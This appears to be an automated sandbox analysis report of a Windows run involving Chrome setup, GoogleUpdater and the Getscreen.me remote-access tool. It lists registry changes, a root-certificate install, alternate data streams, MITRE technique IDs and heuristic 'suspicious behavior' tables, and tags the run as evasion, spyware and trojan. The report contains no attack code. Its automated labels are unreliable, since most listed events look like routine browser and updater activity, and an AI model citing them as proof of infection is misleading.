Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\AppID = "{ABC01078-F197-4B0B-ADBC-CFE684B39C82}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}\ = "IUpdateStateSystem"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\TypeLib\ = "{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\1.0\ = "GoogleUpdater TypeLib for IAppBundleWeb"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\ServiceParameters = "--com-service"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\0\win32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}\TypeLib\ = "{1588C1A8-27D9-563E-9641-8D20767FB258}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{ACAB122B-29C0-56A9-8145-AFA2F82A547C}\1.0\0	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{699F07AD-304C-5F71-A2DA-ABD765965B54}\1.0\ = "GoogleUpdater TypeLib for IUpdaterAppStatesCallbackSystem"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4DC034A8-4BFC-4D43-9250-914163356BB0}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\TypeLib\ = "{0CD01D1E-4A1C-489D-93B9-9B6672877C57}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{0486745C-8D9B-5377-A54C-A61FFAA0BBE4}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C4622B28-A747-44C7-96AF-319BE5C3B261}\ProxyStubClsid32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{F966A529-43C6-4710-8FF4-0B456324C8F4}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8A4B5D74-8832-5170-AB03-2415833EC703}\ = "IUpdaterInternalSystem"	updater.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\VersionIndependentProgID	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B7FD5390-D593-5A8B-9AE2-23CE39822FD4}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\4"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F966A529-43C6-4710-8FF4-0B456324C8F4}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F966A529-43C6-4710-8FF4-0B456324C8F4}\TypeLib\Version = "1.0"	updater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\*\shell\Download with Getscreen.me\ = "Download with Getscreen.me"	getscreen.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C4622B28-A747-44C7-96AF-319BE5C3B261}\TypeLib	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1588C1A8-27D9-563E-9641-8D20767FB258}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\4"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\TypeLib	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{5F793925-C903-4E92-9AE3-77CA5EAB1716}\TypeLib	updater.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}	updater.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachine	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4622B28-A747-44C7-96AF-319BE5C3B261}\ = "IAppBundleWebSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C4622B28-A747-44C7-96AF-319BE5C3B261}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{F4334319-8210-469B-8262-DD03623FEB5B}\1.0\0\win32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{F258BE54-7C5F-44A0-AAE0-730620A31D23}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\TypeLib	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32	updater.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalServer32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID\{8018F647-BF07-55BB-82BE-A2D7049F7CE4}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}\ = "IUpdateStateSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{1588C1A8-27D9-563E-9641-8D20767FB258}\1.0\0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\TypeLib	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A4B5D74-8832-5170-AB03-2415833EC703}\TypeLib\Version = "1.0"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ServiceParameters = "--com-service"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{513BC7DA-6B8D-45F7-90A0-2E9F66CEF962}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\TypeLib	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DC034A8-4BFC-4D43-9250-914163356BB0}\TypeLib\ = "{4DC034A8-4BFC-4D43-9250-914163356BB0}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\ = "ICompleteStatusSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F258BE54-7C5F-44A0-AAE0-730620A31D23}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\TypeLib\Version = "1.0"	updater.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	chrome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	chrome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	chrome.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Webstore Downloads\cjpalhdlnbpafiamejdnhcphjbkeiagm_58314.crx:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Local\Temp\scoped_dir1468_2042104710\cjpalhdlnbpafiamejdnhcphjbkeiagm_58314.crx\:Zone.Identifier:$DATA	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\ChromeSetup.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\getscreen.exe:Zone.Identifier	chrome.exe
File created	C:\ProgramData\Getscreen.me\dzjqtuxwimtiosjogvbxhxcjqukpbuu-elevate.exe\:Zone.Identifier:$DATA	getscreen.exe
File created	C:\Program Files\Getscreen.me\getscreen.exe\:Zone.Identifier:$DATA	getscreen.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
1712	msedge.exe
1712	msedge.exe
3376	msedge.exe
3376	msedge.exe
1924	identity_helper.exe
1924	identity_helper.exe
852	chrome.exe
852	chrome.exe
4952	updater.exe
4952	updater.exe
4952	updater.exe
4952	updater.exe
4952	updater.exe
4952	updater.exe
5116	updater.exe
5116	updater.exe
5116	updater.exe
5116	updater.exe
5116	updater.exe
5116	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1988	updater.exe
1468	chrome.exe
1468	chrome.exe
1972	getscreen.exe
1972	getscreen.exe
616	getscreen.exe
616	getscreen.exe
1536	getscreen.exe
1536	getscreen.exe
5920	chrome.exe
5920	chrome.exe
616	getscreen.exe
616	getscreen.exe
2692	getscreen.exe
2692	getscreen.exe
616	getscreen.exe
616	getscreen.exe
5984	getscreen.exe
5984	getscreen.exe
6588	updater.exe
6588	updater.exe
6588	updater.exe
6588	updater.exe
6808	updater.exe
6808	updater.exe
6808	updater.exe
6808	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe
6612	updater.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs

pid	Process
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe
Token: SeShutdownPrivilege	852	chrome.exe
Token: SeCreatePagefilePrivilege	852	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe

Suspicious use of SendNotifyMessage 54 IoCs

pid	Process
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
852	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
5084	getscreen.exe
5084	getscreen.exe
5084	getscreen.exe
5084	getscreen.exe
5084	getscreen.exe
5084	getscreen.exe
5084	getscreen.exe
3092	getscreen.exe
3092	getscreen.exe
3092	getscreen.exe
3092	getscreen.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
3092	getscreen.exe
3092	getscreen.exe
3092	getscreen.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3376 wrote to memory of 3196	3376	msedge.exe	81
PID 3376 wrote to memory of 3196	3376	msedge.exe	81
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 2224	3376	msedge.exe	82
PID 3376 wrote to memory of 1712	3376	msedge.exe	83
PID 3376 wrote to memory of 1712	3376	msedge.exe	83
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
